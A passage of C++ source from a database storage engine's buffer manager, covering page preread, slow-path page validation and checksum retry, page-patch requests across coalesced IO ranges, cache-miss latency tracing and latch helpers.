( bfprf & bfprfDBScan ) ? bflfDBScan : bflfNone ); // bflfTraceOnly
fBFOwned = fFalse;
Call( err );
// the page was added to the cache - no more failures allowed
// schedule the read of the page image from disk. further preread
// manipulation of the BF will be done in BFIAsyncReadComplete()
TraceContextScope tcPreread( iorpBFPreread );
CallS( ErrBFIAsyncRead( pbf, qos, pioreqReserved, *tcPreread ) );
pioreqReserved = NULL;
// success at touching off pre-read, update stats
PERFOpt( cBFPagesPreread.Inc( PinstFromIfmp( ifmp ), (TCE) tc.nParentObjectClass ) );
Ptls()->threadstats.cPagePreread++;
OSTraceFMP( ifmp, JET_tracetagBufferManager, OSFormat( "Preread page=[0x%x:0x%x]", (ULONG)ifmp, pgno ) );
}
else
{
PERFOpt( cBFPagesPrereadUnnecessary.Inc( PinstFromIfmp( ifmp ), (TCE) tc.nParentObjectClass ) );
}
HandleError:
if ( pioreqReserved != NULL )
{
BFIAsyncReleaseUnusedIOREQ( ifmp, pioreqReserved );
}
if ( fBFOwned )
{
BFIFreePage( pbf, fFalse );
}
return err;
}
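// Illustrative (hypothetical) usage sketch - the flag/priority choices below are
// assumptions for illustration only:
//
//   TraceContextScope tcPreread( iorpBFPreread );
//   const ERR errPreread = ErrBFIPrereadPage( ifmp, pgno, bfprfCombinableOnly, bfpri, *tcPreread );
//   // errBFPageCached means the page was already resident; errDiskTilt means the
//   // combinable-only IO reservation could not be merged into the IO being built.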
INLINE ERR ErrBFIValidatePage( const PBF pbf, const BFLatchType bflt, const CPageEvents cpe, const TraceContext& tc )
{
// we should only see bfltShared, bfltExclusive, and bfltWrite
Assert( bflt == bfltShared || bflt == bfltExclusive || bflt == bfltWrite );
// if this page is not in an error state then return its current error code
ERR errBF;
if ( ( errBF = pbf->err ) >= JET_errSuccess )
{
AssertRTL( errBF > -65536 && errBF < 65536 );
return errBF;
}
if ( bflt != bfltShared )
{
Assert( FBFIUpdatablePage( pbf ) );
}
// perform slow validation on this page
errBF = ErrBFIValidatePageSlowly( pbf, bflt, cpe, tc );
// This bf could've been read as part of a coalesced IO.
// In that case, validate all pages of the coalesced IO for patchable corruptions.
if ( BoolParam( PinstFromIfmp( pbf->ifmp ), JET_paramEnableExternalAutoHealing )
&& PagePatching::FIsPatchableError( errBF )
&& CPageValidationLogEvent::LOG_NONE != cpe )
{
BFIPatchRequestIORange( pbf, cpe, tc );
}
Assert( errBF != errBFIPageNotVerified );
Assert( errBF != errBFIPageRemapNotReVerified );
return errBF;
}
INLINE BOOL FBFIDatabasePage( const PBF pbf )
{
// determines if the page contains
// unstructured data
// UNDONE: only sort pages actually need to be
// excluded, but we currently can't differentiate
// between sort pages and temp. table pages, so
// we need to exclude the temp. database
// altogether
return ( !FFMPIsTempDB( pbf->ifmp ) );
}
// we use this function at a few key places (namely on write unlatch/downgrade and
// pre write IO) to check that the pgno is properly set.
LOCAL BOOL FBFIBufferIsZeroed( const PBF pbf ); // fwd decl - temp until pgno validation removed
void BFIValidatePagePgno_( const PBF pbf, PCSTR szFunction )
{
if ( FBFIDatabasePage( pbf ) && !FIsSmallPage() )
{
CPAGE cpage;
cpage.LoadPage( pbf->ifmp, pbf->pgno, pbf->pv, CbBFIBufferSize( pbf ) );
const PGNO pgnoOnPage = g_fRepair ? cpage.PgnoREPAIRThis() : cpage.PgnoThis();
const PGNO pgnoInBF = pbf->pgno;
if ( pgnoOnPage == 0 || pgnoOnPage != pgnoInBF )
{
// pgno is not valid, deal with repair special case ...
if ( g_fRepair )
{
// in repair pgno can be zero, but can't be mismatched if non-zero
Enforce( pgnoOnPage == 0 || pgnoOnPage == pgnoInBF );
// in repair data we'll allow non-zero, but if zero, data must be all zeros
Enforce( pgnoOnPage != 0 || FBFIBufferIsZeroed( pbf ) );
}
else
{
WCHAR wszEnforceMessage[128];
OSStrCbFormatW( wszEnforceMessage, sizeof(wszEnforceMessage), L"pgnoOnPage(%d) != pgnoInBF(%d) @ %hs", pgnoOnPage, pgnoInBF, szFunction );
PageEnforceSz( cpage, fFalse, L"CachePgnoMismatch", wszEnforceMessage );
}
}
}
}
void BFIValidatePageUsed( const PBF pbf )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
}
const ULONG shfUserPriorityTag = 24;
BYTE BUserPriTagOnly( const OSFILEQOS qos )
{
QWORD qw = ( qos >> shfUserPriorityTag );
// There should be no high DWORD qos bits, so the result should be just the user tag.
Assert( ( qw & (QWORD)~0xFF ) == 0 );
Assert( ( ( qosIOUserPriorityTraceMask & qos ) >> shfUserPriorityTag ) == qw );
return (BYTE)qw;
}
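// For example (assuming the trace mask covers bits 24..31, as the asserts above check):
// a qos of 0x05000000 carries user priority tag 5, and BUserPriTagOnly() returns 5.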
JETUNITTEST( BF, BFICheckUserPriorityTagFitsInHighDwordByte )
{
CHECK( UsBits( qosIOUserPriorityTraceMask ) == UsBits( ( qosIOUserPriorityTraceMask >> shfUserPriorityTag ) ) );
}
void BFITrackCacheMissLatency( const PBF pbf, HRT hrtStartWait, const BFTraceCacheMissReason bftcmr, const OSFILEQOS qosIoPriorities, const TraceContext& tc, ERR errTrueIo /* ErrMMIORead() - true page deref */ )
{
const HRT dhrt = HrtHRTCount() - hrtStartWait;
const QWORD usecsWait = ( 1000000 * dhrt ) / HrtHRTFreq();
Assert( bftcmr != bftcmrInvalid );
// update cache miss latency counters
if ( !PinstFromIfmp( pbf->ifmp )->FRecovering() )
{
PERFOpt( cBFCacheMissLatencyTotalTicksAttached.Add( PinstFromIfmp( pbf->ifmp )->m_iInstance, pbf->tce, CmsecHRTFromDhrt( dhrt ) ) );
PERFOpt( cBFCacheMissLatencyTotalOperationsAttached.Inc( PinstFromIfmp( pbf->ifmp )->m_iInstance, pbf->tce ) );
}
// track cache miss latency thread stats
TLS* ptls = Ptls();
ptls->threadstats.cusecPageCacheMiss += usecsWait;
ptls->threadstats.cPageCacheMiss++;
if ( errTrueIo >= JET_errSuccess && FBFIDatabasePage( pbf ) && ( ( CPAGE::PGHDR * )( pbf->pv ) )->fFlags & CPAGE::fPageLongValue )
{
ptls->threadstats.cusecLongValuePageCacheMiss += usecsWait;
ptls->threadstats.cLongValuePageCacheMiss++;
}
// trace this cache miss latency
GetCurrUserTraceContext getutc;
static_assert( sizeof(bftcmr) == sizeof(BYTE), "Because trace type is as byte" );
ETCacheMissLatency(
pbf->ifmp,
pbf->pgno,
getutc->context.dwUserID,
getutc->context.nOperationID,
getutc->context.nOperationType,
getutc->context.nClientType,
getutc->context.fFlags,
getutc->dwCorrelationID,
tc.iorReason.Iorp(),
tc.iorReason.Iors(),
tc.iorReason.Iort(),
tc.iorReason.Ioru(),
tc.iorReason.Iorf(),
pbf->tce,
usecsWait,
bftcmr,
BUserPriTagOnly( qosIoPriorities ) );
}
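// For a sense of the scale conversion above: a dhrt of 5,000 HRT counts at an HRT
// frequency of 10,000,000 counts/sec works out to ( 1000000 * 5000 ) / 10000000 = 500
// microseconds of cache-miss wait charged to the thread stats.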
ERR ErrBFIValidatePageSlowly( PBF pbf, const BFLatchType bflt, const CPageEvents cpe, const TraceContext& tc )
{
ERR err = errCodeInconsistency;
BOOL fRetryingLatch = fFalse;
TICK tickStartRetryLatch = 0;
BOOL fPageValidated = fFalse; // Doesn't mean page is valid, means that we fully validated the page to the best
// of our abilities (which cannot always be performed under shared latch).
while ( !fPageValidated )
{
ERR errFault = JET_errSuccess;
Assert( err == errCodeInconsistency );
Assert( ( !fRetryingLatch && ( tickStartRetryLatch == 0 ) ) || ( fRetryingLatch && ( tickStartRetryLatch != 0 ) ) );
Assert( FBFIOwnsLatchType( pbf, bflt ) );
// if this page has already been verified then get the result from the page
ERR errBF = pbf->err;
if ( ( errBF != errBFIPageNotVerified ) &&
( errBF != errBFIPageRemapNotReVerified ) )
{
err = ( pbf->bfdf == bfdfClean || errBF >= JET_errSuccess ?
errBF :
JET_errSuccess );
AssertRTL( err > -65536 && err < 65536 );
Assert( errBF != JET_errFileIOBeyondEOF ); // lingering EOFs should never be in the cache.
Assert( !fPageValidated );
fPageValidated = fTrue;
}
// we already have or can acquire the exclusive latch
else if ( bflt != bfltShared ||
pbf->sxwl.ErrUpgradeSharedLatchToExclusiveLatch() == CSXWLatch::ERR::errSuccess )
{
const BOOL fReverifyingRemap = ( pbf->err == errBFIPageRemapNotReVerified );
const BOOL fPatchableCodePath =
CPageValidationLogEvent::LOG_NONE != cpe &&
// Cannot mark the page filthy in the reverifying-remap path, so defer patching to next latch attempt
!fReverifyingRemap;
// if the page has still not been verified then verify the page and
// save the result
if ( pbf->err == errBFIPageNotVerified ||
pbf->err == errBFIPageRemapNotReVerified )
{
ERR errValidate = JET_errSuccess;
Assert( FBFIUpdatablePage( pbf ) );
Assert( pbf->icbPage == pbf->icbBuffer );
// if we are mapping views then force a copy-on-write for all pages.
// if that doesn't work then treat it as a disk I/O error
//
// NOTE: we must do this to isolate exceptions that can occur while
// accessing memory mapped files backed by ordinary files. if we
// didn't do this then any code that touches page data could crash
// on an I/O error
//
// NOTE: we used to try and VirtualLock these pages in memory.
// we can't do this anymore because the view cache is being used
// in situations where the cache is configured to hold many views
//
// NOTE: we could use FBFICacheViewCacheDerefIo() but then we are
// passing bfatPageAlloc type pages into ErrMMIORead() which asserts
// that the buffer passed is a mapped file section. So I'm only
// going to do this read for bfatViewMapped here ...
if ( pbf->bfat == bfatViewMapped )
{
Expected( BoolParam( JET_paramEnableViewCache ) ); // currently JET_paramEnableViewCache is global, so this implies it is on.
HRT hrtStart = HrtHRTCount();
// It could be this causes a painful issue, even with our residency check, and if so we
// might have to parameterize this as a bit under JET_paramEnableViewCache if we get a
// serious number of "AVs" / randomly placed in-page exceptions.
errValidate = g_rgfmp[pbf->ifmp].Pfapi()->ErrMMIORead( OffsetOfPgno( pbf->pgno ), (BYTE*)pbf->pv, CbBFIPageSize( pbf ), IFileAPI::fmmiorfKeepCleanMapped );
BFITrackCacheMissLatency( pbf, hrtStart, bftcmrReasonMapViewRead, 0, tc, errValidate );
Ptls()->threadstats.cPageRead++;
}
// perform page verification
if ( errValidate >= JET_errSuccess )
{
errValidate = ErrBFIVerifyPage( pbf, cpe, fTrue );
}
if ( errValidate < JET_errSuccess )
{
(void)ErrERRCheck( errValidate );
}
pbf->err = SHORT( errValidate );
Assert( pbf->err == errValidate );
if ( FBFIDatabasePage( pbf ) && pbf->err >= JET_errSuccess && fPatchableCodePath && !FNegTest( fStrictIoPerfTesting ) )
{
errFault = ErrFaultInjection( 34788 );
if ( errFault < JET_errSuccess )
{
pbf->err = SHORT( errFault );
Expected( PagePatching::FIsPatchableError( pbf->err ) );
}
}
PERFOpt( cBFCacheUnused.Dec( PinstFromIfmp( pbf->ifmp ), pbf->tce ) );
// if there was no error while verifying the page and we can rule
// out the existence of any active versions by its dbtime then go
// ahead and reset all versioned state on the page
//
// must exclude pages with unstructured data
//
// NOTE: these updates are being done as if under a WAR Latch
// NOTE: if we are mapping views then do not allow discretionary updates
// While we do this only for bfatFracCommit, this could be applied to
// bfatPageAlloc as well, but that'd be pointless because that is only
// used for beyond-EOF / new pages - where we don't need cleanup.
if ( pbf->bfat == bfatFracCommit )
{
if ( pbf->err >= JET_errSuccess && FBFIDatabasePage( pbf ) )
{
CPAGE cpage;
Assert( CbBFIBufferSize( pbf ) == CbBFIPageSize( pbf ) );
cpage.LoadPage( pbf->ifmp, pbf->pgno, pbf->pv, CbBFIBufferSize( pbf ) );
// not RO database and page is definitely old enough or in redo
if ( !g_rgfmp[ pbf->ifmp ].m_fReadOnlyAttach &&
cpage.Dbtime() < g_rgfmp[ pbf->ifmp ].DbtimeOldestGuaranteed() )
{
if ( FNDAnyNodeIsVersioned( cpage ) )
{
NDResetVersionInfo( &cpage );
BFIDirtyPage( pbf, bfdfUntidy, *TraceContextScope() ); // don't care about tracing untidy touches
}
}
cpage.UnloadPage();
}
}
Assert( FBFIUpdatablePage( pbf ) ); // should still hold ...
#ifdef ENABLE_CLEAN_PAGE_OVERWRITE
// we've validated the page: it checksums, is the right page, and is probably not a lost flush, so now if
// the IO was suspiciously slow we suspect the disk is having trouble with bad blocks at or near
// this page, so we are going to over-write the page (in the perhaps vain hope it helps). But we don't
// do the overwriting here, we just mark it dirty and let scavenge or something write it out. In the
// future we're considering remapping the page to a different page.
if ( pbf->fSuspiciouslySlowRead &&
pbf->err >= JET_errSuccess &&
!g_rgfmp[ pbf->ifmp ].m_fReadOnlyAttach &&
!PinstFromIfmp( pbf->ifmp )->m_fTermInProgress )
{
// Note this is a little risky b/c the page is clean and we will call BFIResetLgposOldestBegin0( pbf )
// which can take locks ... we'll see how this goes under fault injection.
BFIDirtyPage( pbf, bfdfDirty, *TraceContextScope() );
}
#endif
// is the page valid, and full sized ...
if ( pbf->err >= JET_errSuccess &&
pbf->icbBuffer == pbf->icbPage )
{
// try to dehydrate the page
// first we must have the write latch
CSXWLatch::ERR errTryW = CSXWLatch::ERR::errSuccess;
if ( bflt != bfltWrite )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() );
errTryW = pbf->sxwl.ErrTryUpgradeExclusiveLatchToWriteLatch();
}
// if we have the write latch, we can proceed with dehydration
if ( CSXWLatch::ERR::errSuccess == errTryW )
{
Assert( pbf->sxwl.FOwnWriteLatch() );
// Do dehydration
BFIDehydratePage( pbf, fTrue );
if ( bflt != bfltWrite )
{
pbf->sxwl.DowngradeWriteLatchToExclusiveLatch();
}
}
}
} // if ( /* not verified: */ pbf->err == errBFIPageNotVerified || pbf->err == errBFIPageRemapNotReVerified )
if ( PagePatching::FIsPatchableError( pbf->err ) &&
fPatchableCodePath &&
( errFault < JET_errSuccess || g_rgfmp[pbf->ifmp].Pfapi()->CLogicalCopies() > 1 ) )
{
// try to patch the page from copy
// first we must have the write latch
if ( bflt != bfltWrite &&
pbf->sxwl.ErrUpgradeExclusiveLatchToWriteLatch() == CSXWLatch::ERR::errWaitForWriteLatch )
{
PERFOpt( cBFLatchStall.Inc( perfinstGlobal ) );
pbf->sxwl.WaitForWriteLatch();
}
Assert( pbf->sxwl.FOwnWriteLatch() );
Assert( pbf->icbBuffer == pbf->icbPage );
// Do the patch
PagePatching::TryPatchFromCopy( pbf->ifmp, pbf->pgno, pbf->pv, &pbf->err );
// This causes problem when called from FBFICompleteFlushPage since it may already have BFFMP locked
if ( pbf->err >= JET_errSuccess &&
!g_rgfmp[ pbf->ifmp ].m_fReadOnlyAttach )
{
BFIDirtyPage( pbf, bfdfFilthy, *TraceContextScope() );
}
if ( bflt != bfltWrite )
{
pbf->sxwl.DowngradeWriteLatchToExclusiveLatch();
}
}
// get the error for this page
err = ( pbf->bfdf == bfdfClean || pbf->err >= JET_errSuccess ?
pbf->err :
JET_errSuccess );
AssertRTL( err > -65536 && err < 65536 );
Assert( !fPageValidated );
fPageValidated = fTrue;
// release the exclusive latch if acquired
if ( bflt == bfltShared )
{
pbf->sxwl.DowngradeExclusiveLatchToSharedLatch();
}
Assert( FBFIOwnsLatchType( pbf, bflt ) );
}
// we do not have exclusive access to the page
else
{
Assert( !fRetryingLatch || ( tickStartRetryLatch != 0 ) );
if ( fRetryingLatch && ( DtickDelta( tickStartRetryLatch, TickOSTimeCurrent() ) < 1000 ) )
{
// We've already tried this shared latch case and gotten a -1018 / checksum failure. If it's a fixable bit flip, there
// is no point trying again with a shared latch; we need to sleep around until either we end up in the first if clause because
// the BF got verified by the other thread, or we can try to get the x-latch ourselves and do a full checksum with ECC correction.
UtilSleep( dtickFastRetry );
continue;
}
ERR errValidate = JET_errSuccess;
Assert( pbf->icbPage == pbf->icbBuffer );
// if we are mapping views then try to touch the page in memory. if
// that doesn't work then treat it as a disk I/O error
//
// NOTE: we must do this to isolate exceptions that can occur while
// accessing memory mapped files backed by ordinary files. if we
// didn't do this then any code that touches page data could crash
// on an I/O error
//
// UNDONE: ideally, we would also attempt to COW the page into our
// working set as we do if we have the exclusive latch. however,
// we cannot do this because the page might be undergoing latchless I/O
// and thus might be write protected. the chance of the page getting
// paged in, paged out, and paged in again w/ an in page error is pretty
// remote anyway
if ( pbf->bfat == bfatViewMapped )
{
Expected( BoolParam( JET_paramEnableViewCache ) ); // currently JET_paramEnableViewCache is global, so this implies it is on.
errValidate = g_rgfmp[pbf->ifmp].Pfapi()->ErrMMIORead( OffsetOfPgno( pbf->pgno ), (BYTE*)pbf->pv, CbBFIPageSize( pbf ), IFileAPI::fmmiorfKeepCleanMapped );
}
// verify the page without saving the results. we do this so that
// we can validate the page without blocking if someone else is
// currently verifying the page
if ( errValidate >= JET_errSuccess )
{
// Important, fFalse controls event and if we update the page, the
// page may or may not be updatable, so it is important
errValidate = ErrBFIVerifyPage( pbf, CPageValidationLogEvent::LOG_NONE, fFalse );
}
// if there is an error in the page then check the status of the page
// again. there are two possibilities: the page is really bad or the
// page was modified by someone with a WAR Latch
//
// if the page is really bad then it will either be flagged as not
// verified or it will be clean and flagged with the verification
// error. if it is still not verified then we should use our own
// result. if it has been verified then we will use the actual result
//
// if the page was modified by someone with a WAR Latch then we know
// that it was verified at one time so we should just go ahead and
// use the result of that validation
//
// there's also another possibility, which is that another thread with a WAR
// latch is about to checksum a page with a fixable error, in which case
// we have just checked the page without error correction enabled and so we'll
// incorrectly return that the page is corrupted; we'll handle that case by
// retrying for some amount of time
if ( errValidate < JET_errSuccess )
{
if ( ( errValidate == JET_errReadVerifyFailure ) && !fRetryingLatch )
{
fRetryingLatch = fTrue;
tickStartRetryLatch = TickOSTimeCurrent();
OnDebug( tickStartRetryLatch = ( tickStartRetryLatch == 0 ) ? 1 : tickStartRetryLatch );
continue;
}
errBF = pbf->err;
if ( ( errBF != errBFIPageNotVerified ) &&
( errBF != errBFIPageRemapNotReVerified ) )
{
err = ( pbf->bfdf == bfdfClean || errBF >= JET_errSuccess ?
errBF :
JET_errSuccess );
}
else
{
err = errValidate;
}
AssertRTL( err > -65536 && err < 65536 );
}
else
{
err = errValidate;
}
Assert( !fPageValidated );
fPageValidated = fTrue;
}
}
Assert( fPageValidated );
Assert( err != errCodeInconsistency );
// If validation fails and we are logging events then issue a patch request. It is safe to
// issue multiple requests for the same page so we can call this every time validation fails.
Assert( FBFIOwnsLatchType( pbf, bflt ) );
if ( BoolParam( PinstFromIfmp( pbf->ifmp ), JET_paramEnableExternalAutoHealing )
&& CPageValidationLogEvent::LOG_NONE != cpe
&& PagePatching::FIsPatchableError( err ) )
{
PagePatching::TryToRequestPatch( pbf->ifmp, pbf->pgno );
}
// return the result
return err;
}
// This method doesn't guarantee a patch request on every page in the range because of locking semantics
void BFIPatchRequestIORange( PBF pbf, const CPageEvents cpe, const TraceContext& tc )
{
AssertSz( !g_fRepair, "Page patching should never happen during repair/integrity check." );
Assert( pbf->sxwl.FOwnSharedLatch() || pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
const IFMP ifmp = pbf->ifmp;
const PGNO pgnoTarget = pbf->pgno;
const JET_ERR errTarget = pbf->err;
INT cpgIOSpan = (INT) ( max( UlParam( JET_paramMaxCoalesceReadSize ), UlParam( JET_paramMaxCoalesceWriteSize ) ) / g_rgfmp[ifmp].CbPage() );
Assert( cpgIOSpan > 0 );
if ( cpgIOSpan <= 1 )
{
return;
}
const BOOL fPassive = PinstFromIfmp( ifmp )->m_plog->FRecovering() &&
PinstFromIfmp( ifmp )->m_plog->FRecoveringMode() == fRecoveringRedo;
// we don't really know where the pgnoTarget was relative to a coalesced IO
// so we assume it was both at the start and the end and request patches for 2x the max IO size
//
PGNO pgnoBegin = max( pgnoNull + 1, pgnoTarget - cpgIOSpan + 1 );
PGNO pgnoEnd = min( pgnoMax, pgnoTarget + cpgIOSpan );
// make sure we don't over-run past the end of the database
Assert( g_rgfmp[ifmp].PgnoLast() >= pgnoTarget );
pgnoEnd = min( pgnoEnd, g_rgfmp[ifmp].PgnoLast() + 1 );
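// To illustrate with assumed example values: a 1 MB max coalesce size and 32 KB pages
// give cpgIOSpan == 32, so for pgnoTarget == 100 we walk pgnos [69, 131] (skipping 100
// itself below), clamped to the end of the database.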
for ( PGNO pgnoCurr = pgnoBegin; pgnoCurr < pgnoEnd; pgnoCurr++ )
{
PGNOPBF pgnopbf;
BFHash::ERR errHash;
BFHash::CLock lock;
if ( pgnoCurr == pgnoTarget )
{
continue;
}
// look up this IFMP / PGNO in the hash table
g_bfhash.ReadLockKey( IFMPPGNO( ifmp, pgnoCurr ), &lock );
errHash = g_bfhash.ErrRetrieveEntry( &lock, &pgnopbf );
g_bfhash.ReadUnlockKey( &lock );
if ( errHash == BFHash::ERR::errSuccess )
{
if ( FBFITryAcquireExclusiveLatchForMaint( pgnopbf.pbf ) ) // ignore the page if we can't lock it
{
Assert( pgnopbf.pbf->sxwl.FOwnExclusiveLatch() );
// Someone can potentially steal our bf; that means it was evicted. We don't need to validate it
//
if( FBFICurrentPage( pgnopbf.pbf, ifmp, pgnoCurr ) )
{
(void)ErrBFIValidatePageSlowly( pgnopbf.pbf, bfltExclusive, cpe, tc ); // ignore error, we don't want to do anything with it
}
pgnopbf.pbf->sxwl.ReleaseExclusiveLatch();
}
}
// if the page isn't present in the cache and we're in recovery, assume it
// needs patching
//
else
{
Assert( errHash == BFHash::ERR::errEntryNotFound );
// note: We don't do active page patching here because we think the active
// page patching pipeline has limited capacity (as we have to roll a log),
// and we think the passive consumes page patch requests only one
// at a time.
if ( BoolParam( PinstFromIfmp( ifmp ), JET_paramEnableExternalAutoHealing )
&& CPageValidationLogEvent::LOG_NONE != cpe
&& fPassive // IMPORTANT! See below g_bfhash unlock comment
&& PagePatching::FIsPatchableError( errTarget ) )
{
PagePatching::TryToRequestPatch( ifmp, pgnoCurr );
}
// if we were patching such pages on the active, we would have to unlock the g_bfhash after
// the patch-request is issued to protect from another thread trying to read in and dirty
// the page ...
// _HOWEVER_, since we're page patching only on passives, we can let go of the g_bfhash
// before the page patch request.
}
}
}
ERR ErrBFIVerifyPageSimplyWork( const PBF pbf )
{
BYTE rgBFLocal[sizeof(BF)];
CPAGE::PGHDR2 pghdr2;
void * pvPage = NULL;
// I can't believe this is 10 lines long to ask a very simple question ...
if ( !FBFIDatabasePage( pbf ) )
{
return JET_errSuccess;
}
memcpy( rgBFLocal, pbf, sizeof(BF) ); // 1. copy off the BF struct ...
CPageValidationNullAction nullaction;
CPAGE cpage;
Assert( CbBFIBufferSize( pbf ) == CbBFIPageSize( pbf ) );
cpage.LoadPage( pbf->ifmp, pbf->pgno, pbf->pv, CbBFIBufferSize( pbf ) );
const ERR err = cpage.ErrValidatePage( pgvfDoNotCheckForLostFlush, &nullaction );
if ( JET_errSuccess != err &&
JET_errPageNotInitialized != err )
{
if ( FIsSmallPage() ) // 2. copy off the page header ...
{
memcpy( &(pghdr2.pghdr), pbf->pv, sizeof(pghdr2.pghdr) );
}
else
{
memcpy( &(pghdr2), pbf->pv, sizeof(pghdr2) );
}
Assert( pbf->icbPage == pbf->icbBuffer );
pvPage = _alloca( CbBFIPageSize( pbf ) ); // 3. now go for the gold,
memcpy( pvPage, pbf->pv, CbBFIPageSize( pbf ) ); // try to copy the page image ...
// finally die here, so we get all this good stuff on the stack ...
EnforceSz( fFalse, OSFormat( "UnexpectedPageValidationFailure:%d", err ) );
// just to make sure pghdr is referenced / not optimized away ...
Assert( pghdr2.pghdr.objidFDP <= 0x7FFFFFFF );
}
// just make sure rgBFLocal is good and referenced too ...
Enforce( ((BF*)rgBFLocal)->ifmp == pbf->ifmp && ((BF*)rgBFLocal)->pgno == pbf->pgno && ((BF*)rgBFLocal)->pv == pbf->pv );
cpage.UnloadPage();
return err;
}
ERR ErrBFIVerifyPage( const PBF pbf, const CPageEvents cpe, const BOOL fFixErrors )
{
ERR err = JET_errSuccess;
CPageEvents cpeActual = cpe;
Assert( pbf->icbPage == pbf->icbBuffer );
// the page contains unstructured data
if ( !FBFIDatabasePage( pbf ) )
{
// the page is verified
return JET_errSuccess;
}
const PGNO pgno = pbf->pgno;
if ( fFixErrors || CPageValidationLogEvent::LOG_NONE != cpe )
{
// In order to fix errors, OR log an event we must be sure we
// have exclusive or better access to the page to keep spurious
// modifications (like resetting version bits)
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
}
else
{
Assert( pbf->sxwl.FOwner() );
}
const LOG * const plog = PinstFromIfmp( pbf->ifmp )->m_plog;
FMP* const pfmp = &g_rgfmp[ pbf->ifmp ];
const BOOL fInRecoveryRedo = ( !plog->FLogDisabled() && ( fRecoveringRedo == plog->FRecoveringMode() ) );
const BOOL fReplayingRequiredRange = fInRecoveryRedo && pfmp->FContainsDataFromFutureLogs();
// compute this page's checksum and pgno
if( CPageValidationLogEvent::LOG_NONE != cpeActual )
{
if( g_fRepair || fInRecoveryRedo )
{
// it is expected for these events to happen during recovery/repair so don't log anything
cpeActual &= ~CPageValidationLogEvent::LOG_UNINIT_PAGE;
}
}
CPageValidationLogEvent validationaction(
pbf->ifmp,
cpeActual,
BUFFER_MANAGER_CATEGORY );
CPAGE cpage;
Assert( CbBFIBufferSize( pbf ) == CbBFIPageSize( pbf ) );
cpage.LoadPage( pbf->ifmp, pgno, pbf->pv, CbBFIBufferSize( pbf ) );
// Note that we only drop lost flush validation during replaying of the required range if the
// current state on the map came from the persisted map on disk (i.e., if we are rebuilding the
// map). We still run lost flush validation during replaying of the required range if the flush
// state is runtime, i.e., if we've already fixed it up, evicted the page and now we're reading
// it back.
const BOOL fFailOnRuntimeLostFlushOnly = ( ( UlParam( PinstFromIfmp( pbf->ifmp ), JET_paramPersistedLostFlushDetection ) & JET_bitPersistedLostFlushDetectionFailOnRuntimeOnly ) != 0 );
const PAGEValidationFlags pgvf =
( fFixErrors ? pgvfFixErrors : pgvfDefault ) |
( ( cpe & CPageValidationLogEvent::LOG_EXTENSIVE_CHECKS ) ? pgvfExtensiveChecks : pgvfDefault ) | // if we aren't logging events, we don't want to fix any errors
( pbf->err != errBFIPageNotVerified ? pgvfDoNotCheckForLostFlush : pgvfDefault ) |
( fFailOnRuntimeLostFlushOnly ? pgvfFailOnRuntimeLostFlushOnly : pgvfDefault ) |
( fReplayingRequiredRange ? pgvfDoNotCheckForLostFlushIfNotRuntime : pgvfDefault );
err = cpage.ErrValidatePage( pgvf, &validationaction );
// Set the flush state for the page if it passed verification and 1) we are recovering the required range
// (lost flush verification was bypassed above) or 2) the state is currently unknown. Or, if we are replaying
// the required range and the page is uninitialized.
// Note that if we are replaying the initial required range of the DB, we take the flush state from the
// page as is and set it on the flush map, prior to any further validation around dbtime consistency, which
// is performed by the log-redo code afterwards. This means that if the dbtime consistency check fails (for
// example, with DbTimeTooOld), it's possible that this "bad" flush state could even get persisted to the
// flush map. This is acceptable because the redo failure prevents the required range from moving past this
// point, which means if we restart, we'll try and fix up the flush state again, and fail with db-time
// verification, and so on. In case the page gets patched in response to the error, the flush state is going
// to be set to 'unknown', which will then work out well once we restart post-patching.
if ( pbf->err == errBFIPageNotVerified )
{
if ( ( err >= JET_errSuccess ) &&
( fReplayingRequiredRange || ( pfmp->PFlushMap()->PgftGetPgnoFlushType( pgno ) == CPAGE::pgftUnknown ) ) )
{
pfmp->PFlushMap()->SetPgnoFlushType( pgno, cpage.Pgft(), cpage.Dbtime() );
}
else if ( ( err == JET_errPageNotInitialized ) && fReplayingRequiredRange )
{
pfmp->PFlushMap()->SetPgnoFlushType( pgno, CPAGE::pgftUnknown );
}
}
cpage.UnloadPage();
return err;
}
LOCAL BOOL FBFIBufferIsZeroed( const PBF pbf )
{
return FUtilZeroed( (BYTE*)pbf->pv, CbBFIBufferSize( pbf ) );
}
// this tells us if the pbf specified is the true buffer for the ifmp:pgno.
bool FBFICurrentPage(
__in const PBF pbf,
__in const IFMP ifmp,
__in const PGNO pgno
)
{
// Must own at least one kind (s, x, or w) of latch to ask this question
Assert( pbf->sxwl.FOwner() );
// This is the definition of current ifmp:pgno ...
return ( pbf->ifmp == ifmp &&
pbf->pgno == pgno &&
pbf->fCurrentVersion );
}
bool FBFIUpdatablePage( __in const PBF pbf )
{
Assert( pbf->sxwl.FOwnExclusiveLatch() || pbf->sxwl.FOwnWriteLatch() );
if ( wrnBFPageFlushPending == pbf->err )
{
return fFalse;
}
return fTrue;
}
#ifdef DEBUG
// validates we own the latch type
BOOL FBFIOwnsLatchType( const PBF pbf, const BFLatchType bfltHave )
{
switch( bfltHave )
{
case bfltShared:
return pbf->sxwl.FOwnSharedLatch();
case bfltExclusive:
return pbf->sxwl.FOwnExclusiveLatch();
case bfltWrite:
return pbf->sxwl.FOwnWriteLatch();
default:
return false;
}
}
#endif
// Given a current latch type we have, releases latch ...
void BFIReleaseSXWL( __inout PBF const pbf, const BFLatchType bfltHave )
{
Assert( FBFIOwnsLatchType( pbf, bfltHave ) ); // redundant
switch( bfltHave )
{
case bfltShared:
Assert( pbf->sxwl.FOwnSharedLatch() );
pbf->sxwl.ReleaseSharedLatch();
break;
case bfltExclusive:
Assert( pbf->sxwl.FOwnExclusiveLatch() );
pbf->sxwl.ReleaseExclusiveLatch();
break;
case bfltWrite:
Assert( pbf->sxwl.FOwnWriteLatch() );
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
// we disabled this code late in E12/Vista due to concerns about correctness, but
// leaving it here to keep the code at as high fidelity as possible.
Expected( pbf->bfls != bflsHashed );
if ( pbf->bfls == bflsHashed )
{
const size_t cProcs = (size_t)OSSyncGetProcessorCountMax();
size_t iProc;
for ( iProc = 0; iProc < cProcs; iProc++ )
{
CSXWLatch* const psxwlProc = &Ppls( iProc )->rgBFHashedLatch[ pbf->iHashedLatch ].sxwl;
psxwlProc->ReleaseWriteLatch();
}
}
#endif // MINIMAL_FUNCTIONALITY
